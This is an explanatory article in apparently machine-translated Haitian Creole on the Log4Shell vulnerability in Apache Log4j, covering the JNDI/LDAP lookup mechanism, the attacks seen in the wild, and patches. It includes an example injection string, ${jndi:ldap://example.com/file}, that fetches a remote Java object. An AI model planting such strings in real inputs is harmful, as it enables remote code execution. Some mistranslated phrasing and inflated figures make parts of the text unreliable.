Table of Contents[Kache][Montre]
Nan fen mwa novanm 2021, nou te dekouvri yon gwo menas pou cybersecurity. Eksplwatasyon sa a ta kapab afekte dè milyon de sistèm òdinatè atravè lemond.
Sa a se yon gid sou vilnerabilite Log4j ak fason yon defo konsepsyon neglije kite plis pase 90% nan sèvis òdinatè nan mond lan louvri pou atak.
Apache Log4j se yon sèvis piblik louvri-sous ki baze sou Java ki devlope pa Apache Software Foundation. Orijinèlman ekri pa Ceki Gülcü an 2001, li se kounye a yon pati nan Apache Logging Services, yon pwojè nan Apache Software Foundation.
Konpayi atravè mond lan itilize bibliyotèk Log4j pou pèmèt antre nan aplikasyon yo. An reyalite, bibliyotèk Java a tèlman omniprésente, ou ka jwenn li nan aplikasyon ki soti nan Amazon, Microsoft, Google, ak plis ankò.
Enpòtans nan bibliyotèk la vle di ke nenpòt defo potansyèl nan kòd la ka kite dè milyon de òdinatè ouvè a piratage. Nan dat 24 novanm 2021, a nwaj sekirite chèchè k ap travay pou Alibaba dekouvri yon defo terib.
Vilnerabilite Log4j, ke yo rele tou Log4Shell, te egziste inapèsi depi 2013. Vilnerabilite a pèmèt aktè move kouri kòd sou sistèm ki afekte yo kouri Log4j. Li te divilge piblikman nan dat 9 desanm 2021
Ekspè nan endistri yo rele defo Log4Shell la pi gwo vilnerabilite nan memwa resan.
Nan semèn apre piblikasyon vilnerabilite a, ekip cybersecurity te detekte dè milyon de atak. Gen kèk chèchè menm obsève yon pousantaj de plis pase yon santèn atak pou chak minit.
Kijan li mache?
Pou konprann poukisa Log4Shell tèlman danjere, nou bezwen konprann ki sa li kapab.
Vilnerabilite Log4Shell pèmèt pou egzekisyon kòd abitrè, ki fondamantalman vle di ke yon atakè ka kouri nenpòt kòmand oswa kòd sou yon machin sib.
Ki jan li akonpli sa a?
Premyèman, nou bezwen konprann sa JNDI a ye.
Java Naming and Directory Interface (JNDI) se yon sèvis Java ki pèmèt pwogram Java dekouvri epi chèche done ak resous atravè yon non. Sèvis anyè sa yo enpòtan paske yo bay yon seri dosye òganize pou devlopè yo fasilman referans lè y ap kreye aplikasyon yo.
JNDI a ka itilize plizyè pwotokòl pou jwenn aksè nan yon sèten anyè. Youn nan pwotokòl sa yo se Pwotokòl Aksè Anyè Lejè, oswa LDAP.
Lè w ap antre yon kòd, log4j fè sibstitisyon fisèl lè yo rankontre ekspresyon fòm nan ${prefix:name}
.
Pou egzanp, Text: ${java:version}
ta ka konekte kòm Tèks: Java vèsyon 1.8.0_65. Sa yo kalite sibstitisyon yo komen.
Nou ka genyen tou ekspresyon tankou Text: ${jndi:ldap://example.com/file}
ki itilize sistèm JNDI pou chaje yon objè Java ki soti nan yon URL atravè pwotokòl LDAP.
Sa a efektivman chaje done ki soti nan URL sa a nan machin nan. Nenpòt pirate potansyèl ka òganize kòd move sou yon URL piblik epi tann pou machin ki itilize Log4j konekte li.
Piske sa ki nan mesaj boutèy demi lit yo genyen done itilizatè yo kontwole, entru yo ka mete pwòp referans JNDI yo ki montre sèvè LDAP ke yo kontwole. Sèvè LDAP sa yo ka plen ak move objè Java ke JNDI a ka egzekite atravè vilnerabilite a.
Ki sa ki fè sa vin pi mal se ke li pa enpòtan si aplikasyon an se yon aplikasyon bò sèvè oswa yon aplikasyon bò kliyan.
Osi lontan ke gen yon fason pou logger a li move kòd atakè a, aplikasyon an toujou ouvè a èksplwatasyon.
Ki moun ki afekte?
Vilnerabilite a afekte tout sistèm ak sèvis ki itilize APache Log4j, ak vèsyon 2.0 jiska e ki gen ladan 2.14.1.
Plizyè ekspè sekirite konseye ke vilnerabilite a ka afekte yon kantite aplikasyon ki itilize Java.
Premye defo a te dekouvri nan jwèt videyo Minecraft ki posede Microsoft. Microsoft te ankouraje itilizatè yo amelyore lojisyèl edisyon Java Minecraft yo pou anpeche nenpòt risk.
Jen Easterly, Direktè Cybersecurity ak Ajans Sekirite Enfrastrikti (CISA) di ke machann yo gen yon gwo responsablite pou anpeche itilizatè final yo soti nan aktè move eksplwate vilnerabilite sa a.
"Machann yo ta dwe kominike tou ak kliyan yo pou asire itilizatè final yo konnen ke pwodwi yo gen vilnerabilite sa a epi yo ta dwe priyorite mizajou lojisyèl."
Atak yo te rapòte deja kòmanse. Symantec, yon konpayi ki bay lojisyèl cybersecurity, te obsève yon kantite varye demann atak.
Men kèk egzanp sou kalite atak chèchè yo te detekte:
- botne
Botnet yo se yon rezo òdinatè ki anba kontwòl yon sèl pati atakan. Yo ede fè atak DDoS, vòlè done, ak lòt frod. Chèchè yo te obsève botne Muhstik nan scripts koki telechaje soti nan Log4j esplwate.
- XMRig Miner Trojan
XMRig se yon minè kriptografik sous louvri ki sèvi ak CPU pou min siy Monero a. Sibèrkriminèl yo ka enstale XMRig sou aparèy moun yo pou yo ka itilize pouvwa pwosesis yo san yo pa konnen.
- Khonsari Ransomware
Ransomware refere a yon fòm malveyan ki fèt pou ankripte dosye yo sou yon òdinatè. Lè sa a, atakè yo ka mande peman an echanj pou bay aksè tounen nan dosye yo chiffres. Chèchè yo te dekouvri ransomware Khonsari nan atak Log4Shell. Yo vize serveurs Windows epi sèvi ak fondasyon .NET.
Kisa ki pral rive apre sa?
Ekspè predi ke li ka pran mwa oswa petèt menm ane pou konplètman ranje dezòd la ki te koze pa vilnerabilite Log4J la.
Pwosesis sa a enplike mete ajou chak sistèm ki afekte yo ak yon vèsyon patched. Menm si tout sistèm sa yo patched, toujou genyen menas de backdoors posib ke entru yo te deja ajoute nan fennèt serveurs yo te louvri pou atak.
Anpil solisyon ak mitigasyon egziste pou anpeche ensèk sa a eksplwate aplikasyon yo. Nouvo Log4j vèsyon 2.15.0-rc1 te chanje plizyè paramèt pou bese vilnerabilite sa a.
Tout karakteristik lè l sèvi avèk JNDI pral enfim pa default ak rechèch aleka yo te restriksyon tou. Enfim karakteristik rechèch la sou konfigirasyon Log4j ou a pral ede diminye risk pou eksplwatasyon posib.
Deyò Log4j, toujou gen bezwen pou yon plan pi laj pou anpeche eksplwatasyon sous louvri.
Byen bonè nan mwa me, Mezon Blanch lan te pibliye yon lòd egzekitif ki te vize amelyore sibèsekirite nasyonal la. Li te gen ladann yon dispozisyon pou yon bòdwo materyèl lojisyèl (SBOM) ki te esansyèlman yon dokiman fòmèl ki gen yon lis chak atik ki nesesè pou bati aplikasyon an.
Sa gen ladann pati tankou a louvri sous pakè, depandans, ak API yo itilize pou devlopman. Menmsi lide SBOM yo itil pou transparans, èske li vrèman ede konsomatè a?
Amelyore depandans ka twòp nan yon konplikasyon. Konpayi yo ka jis chwazi pou peye nenpòt amann olye ke yo riske pèdi tan anplis pou jwenn pakè altènatif. Petèt SBOM sa yo pral itil sèlman si yo Dimansyon limite pi lwen.
konklizyon
Pwoblèm Log4j la se pi plis pase jis yon pwoblèm teknik pou òganizasyon yo.
Lidè biznis yo dwe okouran de risk potansyèl ki ka rive lè sèvè yo, pwodwi yo oswa sèvis yo depann sou kòd ke yo menm yo pa kenbe.
Repoze sou aplikasyon pou sous louvri ak twazyèm pati toujou vini ak kèk kantite risk. Konpayi yo ta dwe konsidere travay sou estrateji pou diminye risk yo anvan nouvo menas parèt.
Anpil nan entènèt la depann sou lojisyèl sous louvri konsève pa plizyè milye volontè atravè lemond.
Si nou vle kenbe entènèt la yon kote ki an sekirite, gouvènman yo ak kòporasyon yo ta dwe envesti nan finansman efò sous louvri ak ajans sibèsekirite tankou CISA.
Kite yon Reply